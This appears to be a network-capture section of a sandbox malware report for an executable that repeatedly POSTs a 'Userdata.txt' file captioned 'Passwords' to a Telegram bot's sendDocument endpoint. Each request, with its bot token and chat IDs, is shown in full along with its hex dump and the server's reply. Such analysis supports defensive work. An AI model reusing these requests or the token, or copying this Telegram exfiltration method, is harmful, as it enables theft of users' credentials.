                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43763,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576651,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449844149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:13 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd321d4072b991
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:13 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 64 34 30 37 32 62 39 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd321d4072b991Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:13 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:13 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:13 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43764,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576653,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.449856149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:14 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd32309fc74a6b
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:14 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 30 39 66 63 37 34 61 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd32309fc74a6bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:14 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:14 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:14 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43765,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576654,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.449868149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:16 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd3242917a2401
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:16 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 32 39 31 37 61 32 34 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd3242917a2401Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:16 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:16 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:16 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43767,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576656,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.449883149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:18 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd325897e9bff1
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:18 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 38 39 37 65 39 62 66 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd325897e9bff1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:18 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:18 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 543
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:18 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43768,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576658,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.449895149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:19 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd326bcf5d4f67
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:24:19 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 62 63 66 35 64 34 66 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd326bcf5d4f67Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:19 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:19 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:19 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43769,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576659,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.449904149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:21 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd327c3cd25000
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:24:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 63 33 63 64 32 35 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd327c3cd25000Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:21 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:21 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:21 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43770,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576661,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.449917149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:22 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd328f5a1d1c8d
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:24:22 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 66 35 61 31 64 31 63 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd328f5a1d1c8dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:22 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:22 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:22 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43771,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576662,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
